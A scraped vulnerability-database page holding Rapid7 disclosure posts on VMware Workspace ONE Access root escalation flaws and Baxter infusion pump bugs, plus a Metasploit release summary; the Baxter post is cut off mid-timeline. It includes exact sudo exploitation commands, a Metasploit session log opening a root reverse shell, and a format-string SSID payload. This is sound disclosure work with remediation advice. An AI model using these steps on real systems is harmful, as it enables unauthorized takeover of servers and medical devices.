DATABASE RESOURCES PRICING ABOUT US

{"id": "RAPID7BLOG:2C118F02F42DB14EC4F6AF30FFB72A76", "vendorId": null, "type": "rapid7blog", "bulletinFamily": "info", "title": "CVE-2022-31660 and CVE-2022-31661 (FIXED): VMware Workspace ONE Access, Identity Manager, and vRealize Automation LPE", "description": "\n\nThe VMware Workspace ONE Access, Identity Manager, and vRealize Automation products contain a locally exploitable vulnerability whereby the under-privileged `horizon` user can escalate their permissions to those of the `root` user. Notably, the `horizon` user runs the externally accessible web application. This means that remote code execution (RCE) within that component could be chained with this vulnerability to obtain remote code execution as the root user. At the time of this writing, [CVE-2022-22954](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954>) is one such RCE vulnerability (that notably has a corresponding [Metasploit module here](<https://github.com/rapid7/metasploit-framework/blob/62bfe03b50a22785b59a069319520531f2663b2b/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb>)) that can be easily chained with one or both of the issues described herein.\n\n## Product description\n\n[VMWare Workspace ONE Access](<https://www.vmware.com/products/workspace-one/access.html>) is a platform that provides organizations with the means to provide their employees fast and easy access to applications they need. VMware Workspace ONE Access was formerly known as VMware Identity Manager.\n\n## Impact\n\nThese vulnerabilities are local privilege escalation flaws, and by themselves, present little risk in an otherwise secure environment. In both cases, the local user must be `horizon` for successful exploitation.\n\nThat said, it\u2019s important to note that the `horizon` user runs the externally accessible web application, which has seen several recent vulnerabilities \u2014 namely [CVE-2022-22954](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954>), which, when exploited, allows for remote code execution as the `horizon` user. Thus, chaining an exploit for CVE-2022-22954 with either of these vulnerabilities can allow a remote attacker to go from no access to root access in two steps.\n\n## Credit\n\nThese issues were disclosed by VMware on Tuesday, August 2, 2022 within the [VMSA-2022-0021](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>) bulletin. In June, Spencer McIntyre of Rapid7 discovered these issues while researching an unrelated vulnerability. They were disclosed in accordance with [Rapid7\u2019s vulnerability disclosure policy](<https://www.rapid7.com/security/disclosure/>).\n\n## CVE-2022-31660\n\nCVE-2022-31660 arises from the fact that the permissions on the file `/opt/vmware/certproxy/bin/cert-proxy.sh` are such that the `horizon` user is both the owner and has access to invoke this file.\n\nTo demonstrate and exploit this vulnerability, that file is overwritten, and then the following command is executed as the `horizon` user:\n \n \n sudo /usr/local/horizon/scripts/certproxyService.sh restart\n \n\nNote that, depending on the patch level of the system, the certproxyService.sh script may be located at an alternative path and require a slightly different command:\n \n \n sudo /opt/vmware/certproxy/bin/certproxyService.sh restart\n \n\nIn both cases, the horizon user is able to invoke the `certproxyService.sh` script from sudo without a password. This can be verified by executing `sudo -n --list`. The `certproxyService.sh` script invokes the `systemctl` command to restart the service based on its configuration file. The service configuration file, located at `/run/systemd/generator.late/vmware-certproxy.service`, dispatches to `/etc/rc.d/init.d/vmware-certproxy` through the `ExecStart` and `ExecStop` directives, which in turn executes `/opt/vmware/certproxy/bin/cert-proxy.sh`.\n\n### Proof of concept\n\nTo demonstrate this vulnerability, a Metasploit module was written and submitted on GitHub in [PR #16854](<https://github.com/rapid7/metasploit-framework/pull/16854>).\n\nWith an existing Meterpreter session, no options other than the SESSION need to be specified. Everything else will be automatically determined at runtime. In this scenario, the original Meterpreter session was obtained with the [module for CVE-2022-22954](<https://github.com/rapid7/metasploit-framework/blob/6532365dc84c2052018456434363e4bfeca85ad4/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb>), released earlier this year.\n \n \n [*] Sending stage (40132 bytes) to 192.168.159.98\n [*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.98:42312) at 2022-08-02 16:26:16 -0400\n \n meterpreter > sysinfo\n Computer : photon-machine\n OS : Linux 4.19.217-1.ph3 #1-photon SMP Thu Dec 2 02:29:27 UTC 2021\n Architecture : x64\n System Language : en_US\n Meterpreter : python/linux\n meterpreter > getuid\n Server username: horizon\n meterpreter > background \n [*] Backgrounding session 1...\n msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > use exploit/linux/local/vmware_workspace_one_access_certproxy_lpe \n [*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp\n msf6 exploit(linux/local/vmware_workspace_one_access_certproxy_lpe) > set SESSION -1\n SESSION => -1\n msf6 exploit(linux/local/vmware_workspace_one_access_certproxy_lpe) > run\n \n [*] Started reverse TCP handler on 192.168.250.134:4444 \n [*] Backing up the original file...\n [*] Writing '/opt/vmware/certproxy/bin/cert-proxy.sh' (601 bytes) ...\n [*] Triggering the payload...\n [*] Sending stage (40132 bytes) to 192.168.250.237\n [*] Meterpreter session 2 opened (192.168.250.134:4444 -> 192.168.250.237:63493) at 2022-08-02 16:26:57 -0400\n [*] Restoring file contents...\n [*] Restoring file permissions...\n \n meterpreter > getuid\n Server username: root\n meterpreter >\n \n\n## CVE-2022-31661\n\nCVE-2022-31660 arises from the fact that the `/usr/local/horizon/scripts/getProtectedLogFiles.hzn` script can be run with root privileges without a password using the sudo command. This script in turn will recursively change the ownership of a user-supplied directory to the `horizon` user, effectively granting them write permissions to all contents.\n\nTo demonstrate and exploit this vulnerability, we can execute the following command as the `horizon` user:\n \n \n sudo /usr/local/horizon/scripts/getProtectedLogFiles.hzn exportProtectedLogs /usr/local/horizon/scripts/\n \n\nAt this point, the horizon user has write access (through ownership) to a variety of scripts that also have the right to invoke using sudo without a password. These scripts can be verified by executing `sudo -n --list`. A careful attacker would have backed up the ownership information for each file in the directory they intend to target and restored them once they had obtained root-level permissions.\n\nThe root cause of this vulnerability is that the `exportProtectedLogs` subcommand invokes the `getProtectedLogs` function that will change the ownership information to the `TOMCAT_USER`, which happens to be `horizon`.\n\nExcerpt from `getProtectedLogFiles.hzn`:\n \n \n function getProtectedLogs()\n {\n chown ${TOMCAT_USER}:${TOMCAT_GROUP} $TARGET_DIR_LOCATION\n rm -f $TARGET_DIR_LOCATION/messages*\n rm -f $TARGET_DIR_LOCATION/boot*\n rm -rf $TARGET_DIR_LOCATION/journal*\n \n cp $VAR_LOG_MESSAGES* $TARGET_DIR_LOCATION\n cp $BOOT_LOG_MESSAGES* $TARGET_DIR_LOCATION\n chown -R ${TOMCAT_USER}:${TOMCAT_GROUP} $TARGET_DIR_LOCATION/\n \n }\n \n\n## Remediation\n\nUsers should apply patches released in [VMSA-2022-0021](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>) to remediate these vulnerabilities. If they are unable to, users should segment the appliance from remote access, especially if known issues in the web front end like CVE-2022-22954 also remain unpatched.\n\nNote that fixing these vulnerabilities helps shore up internal, local defenses against attacks targeting external interfaces. For practical purposes, these issues are merely internal, local privilege escalation issues, so enterprises running VMWare Workspace One Access installations with current patch levels should schedule updates addressing these issues as part of routine patch cycles.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to vulnerabilities described in [VMSA-2022-0021](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>) with authenticated, version-based coverage released on August 4, 2022 (ContentOnly-content-1.1.2606-202208041718).\n\n## Disclosure timeline\n\n * **May 20, 2022** \\- Issue discovered by Spencer McIntyre of Rapid7\n * **June 28, 2022** \\- Rapid7 discloses the vulnerability to VMware\n * **June 29, 2022** \\- VMware acknowledges receiving the details and begins an * investigation\n * **June 30, 2022** \\- VMware confirms that they have reproduced the issues, requests that Rapid7 not involve CERT for simplicity\u2019s sake\n * **July 1, 2022** \\- Rapid7 replies, agreeing to leave CERT out\n * **July 22, 2022** \\- VMware states they will publish an advisory once the issues have been fixed, asks whom to credit\n * **July 22, 2022** \\- Rapid7 responds confirming credit, inquires about a target date for a fix\n * **August 2, 2022** \\- VMware discloses these vulnerabilities as part of VMSA-2022-0021 (without alerting Rapid7 of pending disclosure)\n * **August 2, 2022** \\- Metasploit module submitted on GitHub in [PR #16854](<https://github.com/rapid7/metasploit-framework/pull/16854>)\n * **August 5, 2022** \\- This disclosure blog\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "published": "2022-08-05T15:13:15", "modified": "2022-08-05T15:13:15", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://blog.rapid7.com/2022/08/05/cve-2022-31660-and-cve-2022-31661-fixed-vmware-workspace-one-access-identity-manager-and-vrealize-automation-lpe/", "reporter": "Spencer McIntyre", "references": [], "cvelist": ["CVE-2022-22954", "CVE-2022-31660", "CVE-2022-31661"], "immutableFields": [], "lastseen": "2022-08-05T16:02:09", "viewCount": 213, "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:2BBFFC82-B69B-4A49-9B90-A6E5C745141F", "AKB:3191CCF9-DA8E-43DF-8152-1E3A5D1A3C45", "AKB:959B5BD6-9496-432C-AD1F-DB90CB01C12D"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2022-0206"]}, {"type": "cisa", "idList": ["CISA:07834FF4B4F96A051DF8DCF65DA68FF2"]}, {"type": "cve", "idList": ["CVE-2022-22954", "CVE-2022-31660", "CVE-2022-31661"]}, {"type": "githubexploit", "idList": ["0D5F53B0-63C3-52D0-960A-09382DCD6A64", "479D22AB-BE97-51BA-82CC-F8945ED02516", "49594F88-14A4-5CA9-9202-ABE72435019C", "4F304699-25C8-5BC6-B6F0-717268F65A9D", "76BEF355-6500-5375-ABB3-A0557EB1CDD8", "7EA5501E-29E8-5542-869F-EE5E061312E6", "95C17878-3493-5938-9D11-1C33940763BA", "979EA51E-E85A-5272-9311-AE6B0A2F756D", "A4A3F324-E3F8-5601-A653-3BFEBF5A4F46", "A8AC5191-F5B7-5FE5-8702-B85CC7107869", "B8601FE7-3E95-5AD7-8C4E-05FAB57FBB6D", "C510D823-26C6-5BF9-B30F-5CDF456F72A6", "CB8E07F4-50D7-541D-8B3E-749FACA903E3", "CE3963DC-4AF7-5738-83F3-067854F4CE3C", "D8F56B26-C194-5CA0-83FB-D59BC7014E35", "F12DF8D7-84BD-522E-A6CA-0413FBDFB48F", "F2545817-7A3F-52E7-ADC5-B775C0DB8082", "F63EAD10-66BD-5AD4-BB46-77371E11031D", "FB4E2E7D-EBA0-5AD8-A2C0-6EE27D053537"]}, {"type": "hackerone", "idList": ["H1:1537543", "H1:1537694"]}, {"type": "hivepro", "idList": ["HIVEPRO:4FB5DD5F7C41E3797518D866E88BFA8C", "HIVEPRO:850B279759C02AA5967698B7B141C8C2", "HIVEPRO:8AB9E397F60C70B7C96C5D3CDA945A77", "HIVEPRO:F95B9B5A24C6987E85478A62BD37DD7D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:4AD7D9B99AE2ADD1CBB83E0522B03A21", "MALWAREBYTES:76A60CFA2FA67B3D288E8C0349CFEBF8", "MALWAREBYTES:9E428F767EFCD8CC64A0BC77175C8151"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-LINUX-HTTP-VMWARE_WORKSPACE_ONE_ACCESS_CVE_2022_22954-"]}, {"type": "nessus", "idList": ["VMWARE_WORKSPACE_ONE_ACCESS_CVE-2022-22954.NBIN", "VMWARE_WORKSPACE_ONE_ACCESS_VMSA-2022-0011.NASL", "WEB_APPLICATION_SCANNING_113221"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:166935", "PACKETSTORM:167973"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:02EDDA927928C11A6D10A4A0D17823AF", "RAPID7BLOG:07CA09B4E3B3835E096AA56546C43E8E", "RAPID7BLOG:1ECBAB52CD82AE516E383F64D607FEF9", "RAPID7BLOG:2FC92FBE5A4445611C80C7C3FA7D9354", "RAPID7BLOG:A84DC7A15FD5A2A6BF1C8389827A8B0D", "RAPID7BLOG:FBEE52CB3C438E4C42D6212E07BEFEA9"]}, {"type": "srcincite", "idList": ["SRC-2022-0005"]}, {"type": "thn", "idList": ["THN:36E70A976BC3FFE43255D807083BFC54", "THN:3FE4961C11E2DB2B8015ACFEF6CDFB9B", "THN:64D0BEEE72A10FD1445F5CDC2BC902CD", "THN:7B73599687A27ACB89413C3B769DDF1A", "THN:8E366D56AB2756B4DE53AEEA90675132", "THN:97305EC3B8A0058F1A01ECB0B12FBD3E", "THN:A4284A3BA2971D8DA287C1A8393ECAC8", "THN:E27BF56DBA34B1A89BD29AEB5A6D8405"]}, {"type": "threatpost", "idList": ["THREATPOST:556939F8D58337486DFBC3B2A820DE47", "THREATPOST:590E1D474E265F02BA634F492F728536", "THREATPOST:686B59F4D2481BE96E76E2A3166AAE9B"]}, {"type": "vmware", "idList": ["VMSA-2022-0011", "VMSA-2022-0021"]}, {"type": "zdt", "idList": ["1337DAY-ID-37684", "1337DAY-ID-37891"]}]}, "epss": [{"cve": "CVE-2022-22954", "epss": "0.974450000", "percentile": "0.998910000", "modified": "2023-03-19"}, {"cve": "CVE-2022-31660", "epss": "0.000900000", "percentile": "0.369160000", "modified": "2023-03-19"}, {"cve": "CVE-2022-31661", "epss": "0.000420000", "percentile": "0.056360000", "modified": "2023-03-19"}], "vulnersScore": -0.2}, "_state": {"score": 1659990670, "dependencies": 1659988328, "epss": 1679302437}, "_internal": {"score_hash": "e06cbacccd333e3f4452d252b03fee49"}}

{"rapid7blog": [{"lastseen": "2022-08-05T20:01:16", "description": "## Log4Shell in MobileIron Core\n\n\n\nThanks to [jbaines-r7](<https://github.com/jbaines-r7>) we have yet another Log4Shell [exploit](<https://github.com/rapid7/metasploit-framework/pull/16837>). Similar to the other Log4Shell exploit modules, the exploit works by sending a JNDI string that once received by the server will be deserialized, resulting in unauthenticated remote code execution as the `tomcat` user. Vulnerable versions of MobileIron Core have been reported as [exploited](<https://www.mandiant.com/resources/mobileiron-log4shell-exploitation>) in the wild.\n\n## VMware Workspace ONE Access LPE\n\nOur very own [Spencer McIntyre](<https://github.com/zeroSteiner>) discovered and added a local privilege escalation [module](<https://github.com/rapid7/metasploit-framework/pull/16854>) for [CVE-2022-31660](<https://www.rapid7.com/blog/post/2022/08/05/cve-2022-31660-and-cve-2022-31661-fixed-vmware-workspace-one-access-identity-manager-and-vrealize-automation-lpe/>) in VMware Workspace ONE Access. By default, the `horizon` user has write permissions to the `/opt/vmware/certproxy/bin/cert-proxy.sh` script, and the `sudo` configuration does not require supplying a password when invoking the script. Due to this, an attacker can write arbitrary code to the `/opt/vmware/certproxy/bin/cert-proxy.sh` script and escalate their privileges to that of the `root` user by executing the `certproxyService.sh` with `sudo`. Because the `horizon` user runs the externally-facing web application in VMware Workspace ONE Access, [CVE-2022-22954](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954>) can be leveraged for initial access to the target.\n\n## XML-RPC Unauthenticated RCE in Zoho Password Manager\n\n[Grant Willcox](<https://github.com/gwillcox-r7>) of the Metasploit team added a [module](<https://github.com/rapid7/metasploit-framework/pull/16852>) that exploits a deserialization flaw in Zoho Password Manager Pro. Sending a single POST request containing XML-RPC data to the `/xmlrpc` endpoint will result in unauthenticated code execution as `NT AUTHORITY\\SYSTEM`.\n\n## New module content (5)\n\n * [Cisco PVC2300 POE Video Camera configuration download](<https://github.com/rapid7/metasploit-framework/pull/16857>) by Craig Heffner and Erik Wynter - This adds a module targeting Cisco PVC2300 IP Cameras that will download the configuration file using hard-coded credentials.\n * [BACnet Scanner](<https://github.com/rapid7/metasploit-framework/pull/16788>) by Paz - This adds a new scanner module that discovers BACnet devices on the network and extracts model name, software version, firmware revision, and device description. Once the data is processed, it is displayed on screen and saved to a local xml file.\n * [MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell)](<https://github.com/rapid7/metasploit-framework/pull/16837>) by RageLtMan, Spencer McIntyre, jbaines-r7, and rwincey, which exploits [CVE-2021-44228](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell?referrer=blog>) \\- This adds an exploit for MobileIron which is affected by the Log4Shell vulnerability. The result is an unauthenticated remote code execution in the context of the web application user.\n * [VMware Workspace ONE Access CVE-2022-31660](<https://github.com/rapid7/metasploit-framework/pull/16854>) by Spencer McIntyre, which exploits [CVE-2022-31660](<https://attackerkb.com/topics/GUT2CbttnF/cve-2022-31660?referrer=blog>) \\- This module exploits CVE-2022-31660, an LPE disclosed by VMware in VMSA-2022-0021. The underlying flaw is that the /opt/vmware/certproxy/bin/cert-proxy.sh script is writable by the horizon user who can also indirectly execute it by invoking the certproxyService.sh script via sudo which is permitted without a password, enabling escalation to root.\n * [Zoho Password Manager Pro XML-RPC Java Deserialization](<https://github.com/rapid7/metasploit-framework/pull/16852>) by Grant Willcox, Vinicius, and Y4er, which exploits [CVE-2022-35405](<https://attackerkb.com/topics/9IKNFYh9Wl/cve-2022-35405?referrer=blog>) \\- This PR adds in an exploit module for CVE-2022-35405 aka Zoho Password Manager Pro XML-RPC Unauthenticated RCE as SYSTEM.\n\n## Enhancements and features (3)\n\n * [#16833](<https://github.com/rapid7/metasploit-framework/pull/16833>) from [gwillcox-r7](<https://github.com/gwillcox-r7>) \\- This PR adds an option to the host command to make it easier to delete host tags.\n * [#16840](<https://github.com/rapid7/metasploit-framework/pull/16840>) from [bcoles](<https://github.com/bcoles>) \\- This replaces some Meterpreter-only method calls with method calls that check the session type, which allows non-Meterpreter sessions to use read_profile_list \nand load_missing_hives. Also, this changes read_profile_list to be able to read profile information for all accounts.\n * [#16858](<https://github.com/rapid7/metasploit-framework/pull/16858>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This updates ZeroLogon to have better error handling in the check method. This will cause the error from an invalid NetBIOS name to be reported with a meaningful message.\n\n## Bugs fixed (8)\n\n * [#16820](<https://github.com/rapid7/metasploit-framework/pull/16820>) from [gwillcox-r7](<https://github.com/gwillcox-r7>) \\- This PR fixes an issue in the ldap_query module where if the datastore option &quot;action&quot; wasn't set the module would fail.\n * [#16822](<https://github.com/rapid7/metasploit-framework/pull/16822>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a bug in `Rex::Ui::Text::Input::Buffer::BufferSock` that was causing data to be occasionally lost due to the rsock monitor routine stopping abruptly.\n * [#16825](<https://github.com/rapid7/metasploit-framework/pull/16825>) from [rbowes-r7](<https://github.com/rbowes-r7>) \\- The IMAP credential capture module did not appropriately handle literal strings as specified by RFC3501. The code has been updated to handle these strings efficiently.\n * [#16832](<https://github.com/rapid7/metasploit-framework/pull/16832>) from [gwillcox-r7](<https://github.com/gwillcox-r7>) \\- This fix removes an unnecessary echo statement from the ms10_092_schelevator module.\n * [#16839](<https://github.com/rapid7/metasploit-framework/pull/16839>) from [bcoles](<https://github.com/bcoles>) \\- Fixes shell_registry_enumvals/getvaldata error checking.\n * [#16844](<https://github.com/rapid7/metasploit-framework/pull/16844>) from [bcoles](<https://github.com/bcoles>) \\- This PR updates the `post/multi/gather` module to support non-meterpreter sessions like shell and powershell.\n * [#16846](<https://github.com/rapid7/metasploit-framework/pull/16846>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- Updates `auxiliary/scanner/ssh/ssh_login` to gracefully handle `Errno::EPIPE` exceptions.\n * [#16848](<https://github.com/rapid7/metasploit-framework/pull/16848>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- Fix a crash when updating session information in Meterpreter.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.2.10...6.2.11](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-07-29T13%3A06%3A04-05%3A00..2022-08-04T11%3A39%3A27-05%3A00%22>)\n * [Full diff 6.2.10...6.2.11](<https://github.com/rapid7/metasploit-framework/compare/6.2.10...6.2.11>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-08-05T18:50:07", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22954", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-35405"], "modified": "2022-08-05T18:50:07", "id": "RAPID7BLOG:FBEE52CB3C438E4C42D6212E07BEFEA9", "href": "https://blog.rapid7.com/2022/08/05/metasploit-weekly-wrap-up-170/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-15T18:03:53", "description": "\n\nRapid7, Inc. (Rapid7) discovered vulnerabilities in two TCP/IP-enabled medical devices produced by Baxter Healthcare. The affected products are:\n\n * SIGMA Spectrum Infusion Pump (Firmware Version 8.00.01)\n * SIGMA Wi-Fi Battery (Firmware Versions 16, 17, 20 D29)\n\nRapid7 initially reported these issues to Baxter on April 20, 2022. Since then, members of our research team have worked alongside the vendor to discuss the impact, resolution, and a coordinated response for these vulnerabilities.\n\n## Product description\n\nBaxter\u2019s SIGMA Spectrum product is a commonly used brand of infusion pumps, which are typically used by hospitals to deliver medication and nutrition directly into a patient\u2019s circulatory system. These TCP/IP-enabled devices deliver data to healthcare providers to enable more effective, coordinated care.\n\n## Credit\n\nThe vulnerabilities in two TCP/IP-enabled medical devices were discovered by Deral Heiland, Principal IoT Researcher at Rapid7. They are being disclosed in accordance with [Rapid7\u2019s vulnerability disclosure policy](<https://www.rapid7.com/security/disclosure/>) after coordination with the vendor.\n\n## Vendor statement\n\n\"In support of our mission to save and sustain lives, Baxter takes product security seriously. We are committed to working with the security researcher community to verify and respond to legitimate vulnerabilities and ask researchers to participate in our responsible reporting process. Software updates to disable Telnet and FTP (CVE-2022-26392) are in process. Software updates to address the format string attack (CVE-2022-26393) are addressed in WBM version 20D30 and all other WBM versions. Authentication is already available in Spectrum IQ (CVE-2022-26394). Instructions to erase all data and settings from WBMs and pumps before decommissioning and transferring to other facilities (CVE-2022-26390) are in process for incorporation into the Spectrum Operator\u2019s Manual and are available in the [Baxter Security Bulletin](<https://www.baxter.com/product-security#additionalresources>).\"\n\n## Exploitation and remediation\n\nThis section details the potential for exploitation and our remediation guidance for the issues discovered and reported by Rapid7, so that defenders of this technology can gauge the impact of, and mitigations around, these issues appropriately.\n\n## Battery units store Wi-Fi credentials (CVE-2022-26390)\n\nRapid7 researchers tested Spectrum battery units for vulnerabilities. We found all units that were tested store Wi-Fi credential data in non-volatile memory on the device.\n\nWhen a Wi-Fi battery unit is connected to the primary infusion pump and the infusion pump is powered up, the pump will transfer the Wi-Fi credential to the battery unit.\n\n### Exploitation\n\nAn attacker with physical access to an infusion pump could install a Wi-Fi battery unit (easily purchased on eBay), and then quickly power-cycle the infusion pump and remove the Wi-Fi battery \u2013 allowing them to walk away with critical Wi-Fi data once a unit has been disassembled and reverse-engineered.\n\nAlso, since these battery units store Wi-Fi credentials in non-volatile memory, there is a risk that when the devices are de-acquisitioned and no efforts are made to overwrite the stored data, anyone acquiring these devices on the secondary market could gain access to critical Wi-Fi credentials of the organization that de-acquisitioned the devices.\n\n### Remediation\n\nTo mitigate this vulnerability, organizations should restrict physical access by any unauthorized personnel to the infusion pumps or associated Wi-Fi battery units.\n\nIn addition, before de-acquisitioning the battery units, batteries should be plugged into a unit with invalid or blank Wi-Fi credentials configured and the unit powered up. This will overwrite the Wi-Fi credentials stored in the non-volatile memory of the batteries. Wi-Fi must be enabled on the infusion pump unit for this overwrite to work properly.\n\n## Format string vulnerabilities\n\n### \u201cHostmessage\u201d (CVE-2022-26392)\n\nWhen running a telnet session on the Baxter Sigma Wi-Fi Battery Firmware Version 16, the command \u201chostmessage\u201d is vulnerable to format string vulnerability. \n\n**Exploitation**\n\nAn attacker could trigger this format string vulnerability by entering the following command during a telnet session:\n\n\n\nTo view the output of this format string vulnerability, `_settrace state=on` _must be enabled in the telnet session. _`set trace`_ does not need to be enabled for the format string vulnerability to be triggered, but it does need to be enabled if the output of the vulnerability is to be viewed.\n\nOnce _`set trace`_ is enabled and showing output within the telnet session screen, the output of the vulnerability can be viewed, as shown below, where each _`%x`_ returned data from the device\u2019s process stack.\n\n\n\n### SSID (CVE-2022-26393)\n\nRapid7 also found another format string vulnerability on Wi-Fi battery software version 20 D29. This vulnerability is triggered within SSID processing by the _`get_wifi_location (20)`_ command being sent via XML to the Wi-Fi battery at TCP port 51243 or UDP port 51243.\n\n\n\n**Exploitation**\n\nThis format string vulnerability can be triggered by first setting up a Wi-Fi access point containing format string specifiers in the SSID. Next, an attacker could send a _`get_wifi_location (20)`_ command via TCP Port 51243 or UDP port 51243 to the infusion pump. This causes the device to process the SSID name of the access point nearby and trigger the exploit. The results of the triggering of format strings can be viewed with trace log output within a telnet session as shown below.\n\n\n\nThe SSID of _`AAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x`_ allows for control of 4 bytes on the stack, as shown above, using the _`%x`_ to walk the stack until it reaches 41414141. By changing the leading _`AAAA`_ in the SSID, a malicious actor could potentially use the format string injection to read and write arbitrary memory. At a minimum, using format strings of _`%s`_ and _`%n`_ could allow for a denial of service (DoS) by triggering an illegal memory read (_`%s`_) and/or illegal memory write (_`%n`_).\n\nNote that in order to trigger this DoS effect, the attacker would need to be within normal radio range and either be on the device's network or wait for an authorized _`get_wifi_location`_ command (the latter would itself be a usual, non-default event).\n\n**Remediation**\n\nTo prevent exploitation, organizations should restrict access to the network segments containing the infusion pumps. They should also monitor network traffic for any unauthorized host communicating over TCP and UDP port 51243 to infusion pumps. In addition, be sure to monitor Wi-Fi space for rogue access points containing format string specifiers within the SSID name.\n\n## Unauthenticated network reconfiguration via TCP/UDP (CVE-2022-26394)\n\nAll Wi-Fi battery units tested (versions 16, 17, and 20 D29) allowed for remote unauthenticated changing of the SIGMA GW IP address. The SIGMA GW setting is used for configuring the back-end communication services for the devices operation.\n\n### Exploitation\n\nAn attacker could accomplish a remote redirect of SIGMA GW by sending an XML command 15 to TCP or UDP port 51243. During testing, only the SIGMA GW IP was found to be remotely changeable using this command. An example of this command and associated structure is shown below:\n\n\n\nThis could be used by a malicious actor to man-in-the-middle (MitM) all the communication initiated by the infusion pump. This could lead to information leakage and/or data being manipulated by a malicious actor.\n\n### Remediation\n\nOrganizations using SIGMA Spectrum products should restrict access to the network segments containing the infusion pumps. They should also monitor network traffic for any unauthorized host communicating over TCP and UDP port 51243 to the infusion pumps.\n\n## UART configuration access to Wi-Fi configuration data (additional finding)\n\nThe SIGMA Spectrum infusion pump unit transmits data unencrypted to the Wi-Fi battery unit via universal asynchronous receiver-transmitter (UART). During the power-up cycle of the infusion pump, the first block of data contains the Wi-Fi configuration data. This communication contains the SSID and 64-Character hex PSK.\n\n\n\n### Exploitation\n\nA malicious actor with **physical access** to an infusion pump can place a communication shim between the units (i.e., the pump and the Wi-Fi battery) and capture this data during the power-up cycle of the unit.\n\n\n\n### Remediation \n\n\nTo help prevent exploitation, organizations should restrict physical access by unauthorized persons to the infusion pumps and associated Wi-Fi battery units.\n\nNote that this is merely an additional finding based on physical, hands-on access to the device. While Baxter has addressed this finding through better decommissioning advice to end users, this particular issue does not rank for its own CVE identifier, as local encryption is beyond the scope of the hardware design of the device.\n\n## Disclosure timeline\n\nBaxter is an exemplary medical technology company with an obvious commitment to patient and hospital safety. While medtech vulnerabilities can be tricky and expensive to work through, we're quite pleased with the responsiveness, transparency, and genuine interest shown by Baxter's product security teams.\n\n * **April, 2022:** Issues discovered by [Deral Heiland](<https://twitter.com/Percent_X>) of Rapid7\n * **Wed, April 20, 2022:** Issues reported to [Baxter product security](<https://www.baxter.com/product-security#disclosure>)\n * **Wed, May 11, 2022: **Update requested from Baxter\n * **Wed, Jun 